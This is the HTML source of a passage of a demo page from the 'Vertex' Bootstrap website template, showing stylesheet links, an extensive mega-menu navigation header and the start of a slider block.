﻿<!DOCTYPE html>

<html>
<head>
    <meta charset="utf-8">
    <title>Vertex - Responsive HTML5 Bootstrap Template</title>
    <meta name="keywords" content="HTML5 Template" />
    <meta name="description" content="Vertex - Responsive HTML5 Template">
    <meta http-equiv="X-UA-Compatible" content="IE=edge" />
    <link rel="shortcut icon" type="image/png" href="img/favicon_2.png" />
    <meta name="viewport" content="width=device-width, initial-scale=1.0">

    <!-- Web Fonts  -->
    <link href="../fonts.googleapis.com/css_2.css" rel="stylesheet">

    <!-- Libs CSS -->
    <link href="css/bootstrap.min_2.css" rel="stylesheet" />
    <link href="css/style_2.css" rel="stylesheet" />
    <link href="css/font-awesome.min_2.css" rel="stylesheet" />
    <link href="css/streamline-icon_2.css" rel="stylesheet" />
    <link href="css/header_2.css" rel="stylesheet" />
    <link href="css/portfolio_2.css" rel="stylesheet" />
    <link href="css/blog_2.css" rel="stylesheet" />
    <link href="css/v-animation_2.css" rel="stylesheet" />
    <link href="css/v-bg-stylish_2.css" rel="stylesheet" />
    <link href="css/font-icons_2.css" rel="stylesheet" />
    <link href="css/shortcodes_2.css" rel="stylesheet" />
    <link href="css/utilities_2.css" rel="stylesheet" />
    <link href="css/theme-responsive_2.css" rel="stylesheet" />
    <link href="plugins/aos/aos_2.css" rel="stylesheet" />
    <link href="plugins/owl-carousel/owl.theme_2.css" rel="stylesheet" />
    <link href="plugins/owl-carousel/owl.carousel_2.css" rel="stylesheet" />

    <!-- Current Page CSS -->
    <link href="plugins/rs-plugin/css/settings_2.css" rel="stylesheet" />

    <!-- Skin -->
    <link rel="stylesheet" href="css/skin/default_2.css">

    <!-- Custom CSS -->
    <link rel="stylesheet" href="css/custom_2.css">
</head>

<body>

    <!--Header-->
    <header id="header" data-plugin-options="{'stickyEnabled': true, 'stickyEnableOnBoxed': true, 'stickyEnableOnMobile': true, 'stickyStartAt': 125, 'stickySetTop': '-125px'}">
        <div class="header-body">
            <div class="header-top">
                <div class="header-top-container container">
                    <div class="header-row">
                        <div class="header-column justify-content-start d-none d-sm-flex">
                            <p>Welcome to the Vertex Template</p>
                        </div>
                        <div class="header-column justify-content-end">
                            <ul class="nav">
                                <li class="nav-item">
                                    <a class="nav-link" href="http://bootstraptemplates.net/vertex/contact-us-1.html">Contact Us</a>
                                </li>
                                <li class="nav-item">
                                    <a href="index-header-navbar_2.html#" class="nav-link dropdown-menu-toggle py-2" id="dropdownLanguage" data-toggle="dropdown" aria-haspopup="true" aria-expanded="true">
                                        English	<i class="fa fa-angle-down fa-sm"></i>
                                    </a>
                                    <ul class="dropdown-menu dropdown-menu-right dropdown-language" aria-labelledby="dropdownLanguage">
                                        <li class="menu-header">Select your language</li>
                                        <li><a href="index-header-navbar_2.html#" class="no-skin"><img src="img/blank_2.gif" class="flag flag-us" alt="English" /> USA</a></li>
                                        <li><a href="index-header-navbar_2.html#" class="no-skin"><img src="img/blank_2.gif" class="flag flag-fr" alt="France" /> France</a></li>
                                        <li><a href="index-header-navbar_2.html#" class="no-skin"><img src="img/blank_2.gif" class="flag flag-es" alt="Spain" /> Spain</a></li>
                                        <li><a href="index-header-navbar_2.html#" class="no-skin"><img src="img/blank_2.gif" class="flag flag-de" alt="Germany" /> Germany</a></li>
                                    </ul>
                                </li>
                            </ul>
                            <ul class="header-top-social-icons social-icons social-icons-transparent d-none d-md-block">
                                <li class="social-icons-facebook">
                                    <a href="http://www.facebook.com/" target="_blank" title="Facebook"><i class="fa fa-facebook-f"></i></a>
                                </li>
                                <li class="social-icons-twitter">
                                    <a href="http://www.twitter.com/" target="_blank" title="Twitter"><i class="fa fa-twitter"></i></a>
                                </li>
                                <li class="social-icons-instagram">
                                    <a href="http://www.instagram.com/" target="_blank" title="Instragram"><i class="fa fa-instagram"></i></a>
                                </li>
                            </ul>
                        </div>
                    </div>
                </div>
            </div>
            <div class="header-container container">
                <div class="header-row py-2">
                    <div class="header-column justify-content-start">
                        <div class="header-logo">
                            <a href="index_2.html">
                                <img alt="Vertex" width="130" src="img/logo_2.png">
                            </a>
                        </div>
                    </div>
                    <div class="header-column justify-content-end">
                        <span class="d-none d-md-flex align-items-center mr-4">
                            <i class="icon-map-location text-3 text-color-primary mr-2"></i>
                            1234 Street Name, City Name
                        </span>
                        <span class="d-flex align-items-center mr-sm-4">
                            <i class="icon-headphone text-3 font-weight-bold text-color-primary mr-2"></i>
                            <a href="tel:+1234567890">123-456-7890</a>
                        </span>
                        <span class="d-none d-sm-flex align-items-center">
                            <i class="icon-link-1 text-4 font-weight-bold text-color-primary mr-2"></i>
                            <a href="mail:you@domain.com">you@domain.com</a>
                        </span>
                    </div>
                </div>
                <div class="header-row">
                    <div class="header-column justify-content-start">
                        <div class="header-nav header-nav-border-top justify-content-start">
                            <div class="header-nav-main header-nav-main-uppercase header-nav-main-effect-1 header-nav-main-sub-effect-1">
                                <nav class="collapse">
                                    <ul class="nav flex-column flex-lg-row" id="mainNav">
                                        <li class="dropdown dropdown-mega">
                                            <a class="dropdown-item dropdown-toggle" href="index-header-navbar_2.html#">
                                                Home
                                            </a>
                                            <ul class="dropdown-menu">
                                                <li>
                                                    <div class="dropdown-mega-content">
                                                        <div class="row">
                                                            <div class="col-lg-3 dropdown-mega-sub-content-block overlay overlay-show overlay-color-primary d-none d-lg-block">
                                                                <span class="top-sub-title text-color-light-2 d-block">THE MOST</span>
                                                                <span class="text-color-light font-weight-bold d-block text-4 mb-2">POWERFUL</span>
                                                                <p class="text-color-light-2">A revolutionary theme trusted by tons of customers</p>
                                                                <a class="btn btn-dark btn-rounded btn-v-3 btn-h-2 content-block-button font-weight-semibold" href="index-header-navbar_2.html#">GET STARTED</a>
                                                            </div>
                                                            <div class="col-lg-3 ml-auto">
                                                                <span class="dropdown-mega-sub-title">MULTI PURPOSE</span>
                                                                <ul class="dropdown-mega-sub-nav">
                                                                    <li><a class="dropdown-item" href="index_2.html">Home - Variation 1</a></li>
                                                                    <li><a class="dropdown-item" href="index-2_2.html">Home - Variation 2</a></li>
                                                                    <li><a class="dropdown-item" href="index-3_2.html">Home - Variation 3</a></li>
                                                                    <li><a class="dropdown-item" href="index-4_2.html">Home - Variation 4</a></li>
                                                                    <li><a class="dropdown-item" href="index-5_2.html">Home - Variation 5</a></li>
                                                                    <li><a class="dropdown-item" href="index-6_2.html">Home - Variation 6</a></li>
                                                                    <li><a class="dropdown-item" href="index-7_2.html">Home - Variation 7</a></li>
                                                                    <li><a class="dropdown-item" href="index-8_2.html">Home - Variation 8</a></li>
                                                                </ul>
                                                            </div>
                                                            <div class="col-lg-3">
                                                                <span class="dropdown-mega-sub-title">PORTFOLIO</span>
                                                                <ul class="dropdown-mega-sub-nav">
                                                                    <li><a class="dropdown-item" href="index-9_2.html">Home - Variation 9 </a></li>
                                                                    <li><a class="dropdown-item" href="index-10_2.html">Home - Variation 10 <span class="badge badge-warning badge-sm ml-1">Gap Outside</span></a></li>
                                                                    <li><a class="dropdown-item" href="index-11_2.html">Home - Variation 11</a></li>
                                                                </ul>
                                                                <span class="dropdown-mega-sub-title">Contact Us</span>
                                                                <ul class="dropdown-mega-sub-nav">
                                                                    <li><a class="dropdown-item" href="contact-us_2.html">Contact Us</a></li>
                                                                    <li><a class="dropdown-item" href="contact-us-2_2.html">Contact Us 2</a></li>
                                                                </ul>
                                                            </div>
                                                            <div class="col-lg-3">
                                                                <span class="dropdown-mega-sub-title">About Us</span>
                                                                <ul class="dropdown-mega-sub-nav">
                                                                    <li><a class="dropdown-item" href="page-about-us_2.html">About Us</a></li>
                                                                    <li><a class="dropdown-item" href="page-about-us-2_2.html">About Us 2</a></li>
                                                                    <li><a class="dropdown-item" href="page-about-us-3_2.html">About Us 3</a></li>
                                                                    <li><a class="dropdown-item" href="page-about-us-4_2.html">About Us 4</a></li>
                                                                </ul>
                                                            </div>
                                                        </div>
                                                    </div>
                                                </li>
                                            </ul>
                                        </li>
                                        <li class="dropdown dropdown-mega dropdown-mega-style-2">
                                            <a class="dropdown-item dropdown-toggle" href="index-header-navbar_2.html#">
                                                Elements
                                            </a>
                                            <ul class="dropdown-menu">
                                                <li>
                                                    <div class="dropdown-mega-content container">
                                                        <div class="row">
                                                            <div class="col-lg-3">
                                                                <span class="dropdown-mega-sub-title">ELEMENTS 1</span>
                                                                <ul class="dropdown-mega-sub-nav">
                                                                    <li><a class="dropdown-item" href="element-content-carousel_2.html"><i class="icon-list-1 menu-icon"></i>Content Carousel</a></li>
                                                                    <li><a class="dropdown-item" href="element-common2_2.html#modal-windows"><i class="icon-outbox-2 menu-icon"></i>Modal Windows</a></li>
                                                                    <li><a class="dropdown-item" href="element-testimonials_2.html"><i class="icon-chat-2 menu-icon"></i>Testimonials</a></li>
                                                                    <li><a class="dropdown-item" href="element-brands-clients_2.html"><i class="icon-connection-2 menu-icon"></i>Brands & Clients</a></li>
                                                                    <li><a class="dropdown-item" href="element-common2_2.html#image-frames"><i class="icon-photo-frame menu-icon"></i>Image Frames</a></li>
                                                                    <li><a class="dropdown-item" href="element-buttons_2.html"><i class="icon-cursors menu-icon"></i>Buttons<span class="badge badge-warning badge-sm ml-1">Hot</span></a></li>
                                                                    <li><a class="dropdown-item" href="element-iconboxes_2.html"><i class="icon-star-1 menu-icon"></i>Animation & Feature Boxes</a></li>
                                                                    <li><a class="dropdown-item" href="element-common2_2.html#circle-counters"><i class="icon-heart-plus menu-icon"></i>Circle Counters</a></li>
                                                                    <li><a class="dropdown-item" href="page-about-us-2_2.html"><i class="icon-photo-frame menu-icon"></i>Fancy Heading</a></li>
                                                                    <li><a class="dropdown-item" href="element-common2_2.html#recent-posts"><i class="icon-rss-1 menu-icon"></i>Recent Posts & News</a></li>
                                                                    <li><a class="dropdown-item" href="element-icon-grid_2.html"><i class="icon-grid menu-icon"></i>Icon Grids</a></li>
                                                                </ul>
                                                            </div>
                                                            <div class="col-lg-3">
                                                                <span class="dropdown-mega-sub-title">ELEMENTS 2</span>
                                                                <ul class="dropdown-mega-sub-nav">
                                                                    <li><a class="dropdown-item" href="index-3_2.html"><i class="icon-video-camera-2 menu-icon"></i>Video Section</a></li>
                                                                    <li><a class="dropdown-item" href="element-social-icons_2.html"><i class="icon-link menu-icon"></i>Social Icons</a></li>
                                                                    <li><a class="dropdown-item" href="element-pricing-tables_2.html"><i class="icon-money menu-icon"></i>Pricing Tables</a></li>
                                                                    <li><a class="dropdown-item" href="element-charts_2.html"><i class="icon-business-chart-2 menu-icon"></i>Charts <span class="v-menu-item-info">Hot</span></a></li>
                                                                    <li><a class="dropdown-item" href="element-progress-bar_2.html"><i class="icon-type-2 menu-icon"></i>Progress Bars</a></li>
                                                                    <li><a class="dropdown-item" href="element-tabs_2.html"><i class="icon-window-selection-2 menu-icon"></i>Tab Control</a></li>
                                                                    <li><a class="dropdown-item" href="element-team-member_2.html"><i class="icon-user-star-1 menu-icon"></i>Team Elements</a></li>
                                                                    <li><a class="dropdown-item" href="element-accordion_2.html"><i class="icon-credit-card menu-icon"></i>Accordion & Toggles</a></li>
                                                                    <li><a class="dropdown-item" href="element-call-to-actions_2.html"><i class="icon-bookmark-3 menu-icon"></i>Call To Actions <span class="badge badge-warning badge-sm ml-1">Important</span></a></li>
                                                                    <li><a class="dropdown-item" href="element-process-steps_2.html"><i class="icon-shear-tool menu-icon"></i>Process Steps</a></li>
                                                                    <li><a class="dropdown-item" href="element-animated-headline_2.html"><i class="icon-cigarette menu-icon"></i>Animated Headline</a></li>
                                                                </ul>
                                                            </div>
                                                            <div class="col-lg-3">
                                                                <span class="dropdown-mega-sub-title">ELEMENTS 3</span>
                                                                <ul class="dropdown-mega-sub-nav">
                                                                    <li><a class="dropdown-item" href="element-common_2.html#gridsystem"><i class="icon-arrange-4-1 menu-icon"></i>Grid System</a></li>
                                                                    <li><a class="dropdown-item" href="element-common_2.html#typograpy"><i class="icon-small-caps menu-icon"></i>Typograpy</a></li>
                                                                    <li><a class="dropdown-item" href="element-forms_2.html"><i class="icon-text menu-icon"></i>Form Elements <span class="badge badge-danger badge-sm ml-1">Hot</span></a></li>
                                                                    <li><a class="dropdown-item" href="element-common_2.html#lists"><i class="icon-check-list menu-icon"></i>Lists</a></li>
                                                                    <li class="dropdown-submenu">
                                                                        <a class="dropdown-item dropdown-toggle" href="index-header-navbar_2.html#"><i class="icon-bucket menu-icon"></i> Icons</a>
                                                                        <ul class="dropdown-menu">
                                                                            <li><a class="dropdown-item" href="element-icons_2.html">Font Awesome Icons</a></li>
                                                                            <li><a class="dropdown-item" href="element-icons-2_2.html">Streamline Icons</a></li>
                                                                            <li><a class="dropdown-item" href="element-social-icons_2.html">Social Icons</a></li>
                                                                        </ul>
                                                                    </li>
                                                                    <li><a class="dropdown-item" href="element-common_2.html#info-messages"><i class="icon-information menu-icon"></i>Info Messages</a></li>
                                                                    <li><a class="dropdown-item" href="element-common_2.html#heading-options"><i class="icon-megaphone-1 menu-icon"></i>Heading Options</a></li>
                                                                    <li><a class="dropdown-item" href="element-common_2.html#tagline"><i class="icon-inbox-3 menu-icon"></i>Tagline & Info Boxes</a></li>
                                                                    <li><a class="dropdown-item" href="element-common_2.html#pagination"><i class="icon-scroll-horizontal-1 menu-icon"></i>Pagination</a></li>
                                                                    <li><a class="dropdown-item" href="element-common_2.html#separator-divider"><i class="icon-scissor-1 menu-icon"></i>Separator / Divider</a></li>
                                                                </ul>
                                                            </div>
                                                            <div class="col-lg-3 dropdown-mega-sub-content-block d-none d-lg-block">
                                                                <img src="img/logo-white_2.png" class="img-responsive content-block-image" alt="" width="110" />
                                                                <span class="top-sub-title text-color-light-2 d-block">THE MOST</span>
                                                                <span class="text-color-light font-weight-bold d-block text-4 mb-4">POWERFUL</span>
                                                                <p class="text-color-light-2">A revolutionary theme<br> trusted by tons of<br> customers</p>
                                                                <a class="btn d-inline-block content-block-button text-color-primary font-weight-bold p-0" href="index-header-navbar_2.html#">GET STARTED</a>
                                                            </div>
                                                        </div>
                                                    </div>
                                                </li>
                                            </ul>
                                        </li>
                                        <li class="dropdown">
                                            <a class="dropdown-item dropdown-toggle active" href="index-header-navbar_2.html#">
                                                Features
                                            </a>
                                            <ul class="dropdown-menu">
                                                <li class="dropdown-submenu">
                                                    <a class="dropdown-item dropdown-toggle current" href="index-header-navbar_2.html#"><i class="icon-check-list menu-icon"></i> Headers</a>
                                                    <ul class="dropdown-menu">
                                                        <li class="dropdown-submenu">
                                                            <a class="dropdown-item dropdown-toggle" href="index-header-navbar_2.html#">Top Bar</a>
                                                            <ul class="dropdown-menu">
                                                                <li><a class="dropdown-item" href="index-header-colored-top-bar_2.html">Default + Colored Top Bar</a></li>
                                                                <li><a class="dropdown-item" href="index-header-top-bar-search_2.html">Default + Top Bar with Search</a></li>
                                                                <li><a class="dropdown-item" href="index-header-top-bar-button_2.html">Default + Top Bar with Button</a></li>
                                                            </ul>
                                                        </li>
                                                        <li><a class="dropdown-item" href="index-header-center_2.html">Center</a></li>
                                                        <li><a class="dropdown-item" href="index-header-logo-between-menu_2.html">Logo Between Menu</a></li>
                                                        <li><a class="dropdown-item" href="index-header-below-slider_2.html">Below Slider</a></li>
                                                        <li><a class="dropdown-item" href="index-header-with-borders_2.html">With Borders</a></li>
                                                        <li><a class="dropdown-item" href="index-header-full-width_2.html">Full Width</a></li>
                                                        <li><a class="dropdown-item" href="index-6_2.html">Floating</a></li>
                                                        <li class="dropdown-submenu">
                                                            <a class="dropdown-item dropdown-toggle" href="index-header-navbar_2.html#">Transparent</a>
                                                            <ul class="dropdown-menu">
                                                                <li><a class="dropdown-item" href="portfolio-single_2.html">Transparent</a></li>
                                                                <li><a class="dropdown-item" href="index-8_2.html">Transparent - Bottom Border</a></li>
                                                                <li><a class="dropdown-item" href="index-header-semi-transparent_2.html">Semi Transparent</a></li>
                                                                <li><a class="dropdown-item" href="index-11_2.html">Semi Transparent - Light</a></li>
                                                            </ul>
                                                        </li>
                                                        <li class="dropdown-submenu">
                                                            <a class="dropdown-item dropdown-toggle current" href="index-header-navbar_2.html#">Navbar</a>
                                                            <ul class="dropdown-menu">
                                                                <li><a class="dropdown-item current" href="index-header-navbar_2.html">Navbar</a></li>
                                                                <li><a class="dropdown-item" href="index-header-navbar-centered-logo_2.html">Navbar - Centered Logo</a></li>
                                                            </ul>
                                                        </li>
                                                    </ul>
                                                </li>
                                                <li class="dropdown-submenu">
                                                    <a class="dropdown-item dropdown-toggle" href="index-header-navbar_2.html#"><i class="icon-window-2 menu-icon"></i> Navigations</a>
                                                    <ul class="dropdown-menu">
                                                        <li><a class="dropdown-item" href="index-navigation-top-line_2.html">Top Line</a></li>
                                                        <li><a class="dropdown-item" href="index-navigation-stripe_2.html">Stripe</a></li>
                                                        <li><a class="dropdown-item" href="index-navigation-dark-dropdown_2.html">Dark Dropdown</a></li>
                                                    </ul>
                                                </li>
                                                <li class="dropdown-submenu">
                                                    <a class="dropdown-item dropdown-toggle" href="index-header-navbar_2.html#"><i class="icon-layers menu-icon"></i> Footers</a>
                                                    <ul class="dropdown-menu">
                                                        <li><a class="dropdown-item" href="page-404_2.html#footer">Footer Variation</a></li>
                                                        <li><a class="dropdown-item" href="page-faq_2.html#footer">Footer Variation 2</a></li>
                                                        <li><a class="dropdown-item" href="page-services_2.html#footer">Footer Variation 3</a></li>
                                                        <li><a class="dropdown-item" href="index-11_2.html#footer">Footer Variation 4</a></li>
                                                        <li><a class="dropdown-item" href="feature-footers_2.html">Footer Variation 5</a></li>
                                                    </ul>
                                                </li>
                                                <li class="dropdown-submenu">
                                                    <a class="dropdown-item dropdown-toggle" href="index-header-navbar_2.html#"><i class="icon-arrange-3-5 menu-icon"></i> Page Headers</a>
                                                    <ul class="dropdown-menu">
                                                        <li><a class="dropdown-item" href="index-page-header-left-alignment_2.html">Left Alignment</a></li>
                                                        <li><a class="dropdown-item" href="index-page-header-center-alignment_2.html">Center Alignment</a></li>
                                                        <li><a class="dropdown-item" href="index-page-header-right-alignment_2.html">Right Alignment</a></li>
                                                        <li class="dropdown-submenu">
                                                            <a class="dropdown-item dropdown-toggle" href="index-header-navbar_2.html#">Colors</a>
                                                            <ul class="dropdown-menu">
                                                                <li><a class="dropdown-item" href="index-page-header-color-primary_2.html">Primary Color</a></li>
                                                                <li><a class="dropdown-item" href="index-page-header-color-secondary_2.html">Secondary Color</a></li>
                                                                <li><a class="dropdown-item" href="index-page-header-color-tertiary_2.html">Tertiary Color</a></li>
                                                                <li><a class="dropdown-item" href="index-page-header-color-quaternary_2.html">Quaternary Color</a></li>
                                                            </ul>
                                                        </li>
                                                        <li><a class="dropdown-item" href="index-page-header-dark_2.html">Dark</a></li>
                                                        <li><a class="dropdown-item" href="index-page-header-parallax_2.html">Parallax</a></li>
                                                        <li><a class="dropdown-item" href="index-page-header-video-background_2.html">Video Background</a></li>
                                                        <li><a class="dropdown-item" href="index-page-header-mini_2.html">Mini</a></li>
                                                    </ul>
                                                </li>
                                                <li class="dropdown-submenu">
                                                    <a class="dropdown-item dropdown-toggle" href="index-header-navbar_2.html#"><i class="icon-board menu-icon"></i> Layout Options</a>
                                                    <ul class="dropdown-menu">
                                                        <li><a class="dropdown-item" href="index-10-boxed_2.html">Boxed</a></li>
                                                        <li><a class="dropdown-item" href="index-10_2.html">Gap Outside</a></li>
                                                    </ul>
                                                </li>
                                            </ul>
                                        </li>
                                        <li class="dropdown">
                                            <a class="dropdown-item dropdown-toggle" href="index-header-navbar_2.html#">
                                                Pages
                                            </a>
                                            <ul class="dropdown-menu">
                                                <li class="dropdown-submenu">
                                                    <a class="dropdown-item dropdown-toggle" href="index-header-navbar_2.html#">About Us</a>
                                                    <ul class="dropdown-menu">
                                                        <li><a class="dropdown-item" href="page-about-us_2.html">About Us</a></li>
                                                        <li><a class="dropdown-item" href="page-about-us-2_2.html">About Us 2</a></li>
                                                        <li><a class="dropdown-item" href="page-about-us-3_2.html">About Us 3</a></li>
                                                        <li><a class="dropdown-item" href="page-about-us-4_2.html">About Us 4</a></li>
                                                        <li><a class="dropdown-item" href="page-about-me_2.html">About Me</a></li>
                                                        <li><a class="dropdown-item" href="page-about-me-2_2.html">About Me 2</a></li>
                                                        <li><a class="dropdown-item" href="page-about-me-3_2.html">About Me 3</a></li>
                                                    </ul>
                                                </li>
                                                <li class="dropdown-submenu">
                                                    <a class="dropdown-item dropdown-toggle" href="index-header-navbar_2.html#">Contact Us</a>
                                                    <ul class="dropdown-menu">
                                                        <li><a class="dropdown-item" href="contact-us_2.html">Contact Us</a></li>
                                                        <li><a class="dropdown-item" href="contact-us-2_2.html">Contact Us 2</a></li>
                                                    </ul>
                                                </li>
                                                <li class="dropdown-submenu">
                                                    <a class="dropdown-item dropdown-toggle" href="index-header-navbar_2.html#">Layouts</a>
                                                    <ul class="dropdown-menu">
                                                        <li><a class="dropdown-item" href="page-right-sidebar_2.html">Right Sidebar Page</a></li>
                                                        <li><a class="dropdown-item" href="page-left-sidebar_2.html">Left Sidebar Page</a></li>
                                                        <li><a class="dropdown-item" href="page-left-right-sidebar_2.html">Left & Right Sidebar Page</a></li>
                                                        <li><a class="dropdown-item" href="page-full-width_2.html">Full width Page</a></li>
                                                    </ul>
                                                </li>
                                                <li><a class="dropdown-item" href="page-meet-team_2.html">Team</a></li>
                                                <li class="dropdown-submenu">
                                                    <a class="dropdown-item dropdown-toggle" href="index-header-navbar_2.html#">Services</a>
                                                    <ul class="dropdown-menu">
                                                        <li><a class="dropdown-item" href="page-services_2.html">Services</a></li>
                                                        <li><a class="dropdown-item" href="page-services-2_2.html">Services 2</a></li>
                                                    </ul>
                                                </li>
                                                <li><a class="dropdown-item" href="page-careers_2.html">Careers</a></li>
                                                <li><a class="dropdown-item" href="page-job_2.html">Job Page</a></li>
                                                <li class="dropdown-submenu">
                                                    <a class="dropdown-item dropdown-toggle" href="index-header-navbar_2.html#">Login / Register</a>
                                                    <ul class="dropdown-menu">
                                                        <li><a class="dropdown-item" href="page-login_2.html">Login</a></li>
                                                        <li><a class="dropdown-item" href="page-login-2_2.html">Login 2</a></li>
                                                        <li><a class="dropdown-item" href="page-register_2.html">Register</a></li>
                                                    </ul>
                                                </li>
                                                <li><a class="dropdown-item" href="page-search-result_2.html">Search Result</a></li>
                                                <li><a class="dropdown-item" href="page-help_2.html">Help Page</a></li>
                                                <li><a class="dropdown-item" href="page-author-page_2.html">Author Page</a></li>
                                                <li><a class="dropdown-item" href="page-pricing_2.html">Pricing Page</a></li>
                                                <li class="dropdown-submenu">
                                                    <a class="dropdown-item dropdown-toggle" href="index-header-navbar_2.html#">Extra</a>
                                                    <ul class="dropdown-menu">
                                                        <li><a class="dropdown-item" href="page-faq_2.html">FAQ</a></li>
                                                        <li><a class="dropdown-item" href="page-404_2.html">404 Error</a></li>
                                                        <li><a class="dropdown-item" href="page-privacy_2.html">Privacy Page</a></li>
                                                    </ul>
                                                </li>
                                                <li class="dropdown-submenu">
                                                    <a class="dropdown-item dropdown-toggle" href="index-header-navbar_2.html#">Support</a>
                                                    <ul class="dropdown-menu">
                                                        <li><a class="dropdown-item" href="changelog_2.html"><i class="fa fa-terminal"></i>Changelog</a></li>
                                                        <li><a class="dropdown-item" href="theme-plugins_2.html"><i class="fa fa-star-o"></i>Theme Plugins</a></li>
                                                    </ul>
                                                </li>
                                            </ul>
                                        </li>
                                        <li class="dropdown dropdown-mega dropdown-mega-style-2">
                                            <a class="dropdown-item dropdown-toggle" href="index-header-navbar_2.html#">
                                                Portfolio
                                            </a>
                                            <ul class="dropdown-menu">
                                                <li>
                                                    <div class="dropdown-mega-content container">
                                                        <div class="row">
                                                            <div class="col-lg-3">
                                                                <span class="dropdown-mega-sub-title">Portfolio Gallery</span>
                                                                <ul class="dropdown-mega-sub-nav">
                                                                    <li><a class="dropdown-item" href="portfolio-two-gallery_2.html">Gallery - 2 Columns</a></li>
                                                                    <li><a class="dropdown-item" href="portfolio-three-gallery_2.html">Gallery - 3 Columns</a></li>
                                                                    <li><a class="dropdown-item" href="portfolio-four-gallery_2.html">Gallery - 4 Columns</a></li>
                                                                </ul>
                                                                <span class="dropdown-mega-sub-title">Portfolio Variations</span>
                                                                <ul class="dropdown-mega-sub-nav">
                                                                    <li><a class="dropdown-item" href="portfolio-right-sidebar_2.html">Right Sidebar</a></li>
                                                                    <li><a class="dropdown-item" href="portfolio-left-sidebar_2.html">Left Sidebar</a></li>
                                                                </ul>
                                                            </div>
                                                            <div class="col-lg-3">
                                                                <span class="dropdown-mega-sub-title">Portfolio Standard</span>
                                                                <ul class="dropdown-mega-sub-nav">
                                                                    <li><a class="dropdown-item" href="portfolio-two-standard_2.html">Standard - 2 Columns</a></li>
                                                                    <li><a class="dropdown-item" href="portfolio-three-standard_2.html">Standard - 3 Columns</a></li>
                                                                    <li><a class="dropdown-item" href="portfolio-four-standard_2.html">Standard - 4 Columns</a></li>
                                                                </ul>
                                                            </div>
                                                            <div class="col-lg-3">
                                                                <span class="dropdown-mega-sub-title">Portfolio Masonry</span>
                                                                <ul class="dropdown-mega-sub-nav">
                                                                    <li><a class="dropdown-item" href="portfolio-masonry-gallery_2.html">Gallery</a></li>
                                                                    <li><a class="dropdown-item" href="portfolio-masonry-standard_2.html">Standard</a></li>
                                                                    <li><a class="dropdown-item" href="portfolio-masonry-fw_2.html">Fullwidth Standard</a></li>
                                                                    <li><a class="dropdown-item" href="portfolio-masonry-fw-2_2.html">Fullwidth Gallery</a></li>
                                                                </ul>
                                                            </div>
                                                            <div class="col-lg-3">
                                                                <span class="dropdown-mega-sub-title">Portfolio Single</span>
                                                                <ul class="dropdown-mega-sub-nav">
                                                                    <li><a class="dropdown-item" href="portfolio-single_2.html">Single</a></li>
                                                                    <li><a class="dropdown-item" href="portfolio-single-slider_2.html">Slider</a></li>
                                                                    <li><a class="dropdown-item" href="portfolio-single-2_2.html">Custom</a></li>
                                                                    <li><a class="dropdown-item" href="portfolio-single-gallery_2.html">Gallery</a></li>
                                                                    <li><a class="dropdown-item" href="portfolio-single-fw_2.html">Full Width</a></li>
                                                                    <li><a class="dropdown-item" href="portfolio-single-fw-slides_2.html">Full Width Slides</a></li>
                                                                    <li><a class="dropdown-item" href="portfolio-single-extended_2.html">Extended <span class="badge badge-warning badge-sm ml-1">Showcase</span> </a></li>
                                                                </ul>
                                                            </div>
                                                        </div>
                                                    </div>
                                                </li>
                                            </ul>
                                        </li>
                                        <li class="dropdown">
                                            <a class="dropdown-item dropdown-toggle" href="index-header-navbar_2.html#">
                                                Blog
                                            </a>
                                            <ul class="dropdown-menu">
                                                <li><div class="menu-sm-info">Perfect Design</div></li>
                                                <li><a class="dropdown-item" href="blog-standard-sidebar_2.html"><i class="icon-list-1 menu-icon"></i> Blog Standard</a></li>
                                                <li><a class="dropdown-item" href="blog-mini-sidebar_2.html"><i class="icon-list-2 menu-icon"></i> Blog Small</a></li>
                                                <li><a class="dropdown-item" href="blog-masonry_2.html"><i class="icon-arrange-4-1 menu-icon"></i> Blog Masonry</a></li>
                                                <li><a class="dropdown-item" href="blog-masonry-fw_2.html"><i class="icon-arrange-5 menu-icon"></i> Blog Fullwidth Masonry</a></li>
                                                <li class="dropdown-submenu">
                                                    <a class="dropdown-item dropdown-toggle" href="index-header-navbar_2.html#"><i class="icon-link menu-icon"></i>  Blog Posts</a>
                                                    <ul class="dropdown-menu">
                                                        <li><a class="dropdown-item" href="blog-standard-post_2.html">Standard Post</a></li>
                                                        <li><a class="dropdown-item" href="blog-full-width-post_2.html">Full Width Post</a></li>
                                                        <li><a class="dropdown-item" href="blog-standard-post-2_2.html">Standard Post - Modern</a></li>
                                                        <li><a class="dropdown-item" href="blog-full-width-post-2_2.html">Full Width Post - Modern</a></li>
                                                    </ul>
                                                </li>
                                            </ul>
                                        </li>
                                    </ul>
                                </nav>
                            </div>
                        </div>
                    </div>
                    <div class="header-column justify-content-end">
                        <div class="header-button d-none d-sm-flex ">
                            <a href="index-header-navbar_2.html#" class="btn btn-outline btn-rounded btn-primary btn-4 btn-icon-effect-1" target="_blank">
                                <span class="wrap">
                                    <i class="fa fa-shopping-cart mr-1"></i>
                                    <span>BUY ME</span>
                                </span>
                            </a>
                        </div>
                        <button class="header-btn-collapse-nav ml-3" data-toggle="collapse" data-target=".header-nav-main nav">
                            <span class="hamburguer">
                                <span></span>
                                <span></span>
                                <span></span>
                            </span>
                            <span class="close">
                                <span></span>
                                <span></span>
                            </span>
                        </button>
                    </div>
                </div>
            </div>
        </div>
    </header>
    <!--End Header-->

    <div role="main" class="main">
        <div class="slider-container rev_slider_wrapper slider-container-height-600 bg-light-5">
            <div id="revolutionSlider" class="slider rev_slider" data-version="5.4.7" data-plugin-revolution-slider data-plugin-options="{'delay': 9000, 'gridwidth': [1140,960,720,540], 'gridheight': [600,600,600,600], 'disableProgressBar': 'on', 'responsiveLevels': [4096,1200,992,576], 'parallax': { 'type': 'mouse', 'origo': 'slidecenter', 'speed': 3000, 'levels': [1,2,3,4,5,6,7,12,16,10,50], 'disable_onmobile': 'on' }, 'navigation' : {'arrows': { 'enable': true, 'hide_under': 767, 'style': 'slider-arrows-style-1 slider-arrows-dark' }, 'bullets': {'enable': true, 'hide_under': 767, 'style': 'bullets-style-1', 'hide_onleave': false, 'h_align': 'right', 'v_align': 'bottom', 'space': 7, 'v_offset': 75, 'h_offset': 35}}}">
                <ul>
                    <li data-transition="fade">
                        <img src="http://bootstraptemplates.net/vertex/img/slider/transparent.png" alt="" class="rev-slidebg bg-light-5">

                        <div class="tp-caption rs-parallaxlevel-3"
                             data-x="['-60','-60','-60','-170']"
                             data-y="bottom" data-voffset="['-30','-30','-90','-60']"
                             data-start="2000"
                             data-type="image"
                             data-basealign="slide"
                             data-transform_in="y:[10%];opacity:0;s:500;"
                             data-transform_out="y:[10%];opacity:0;s:500;">
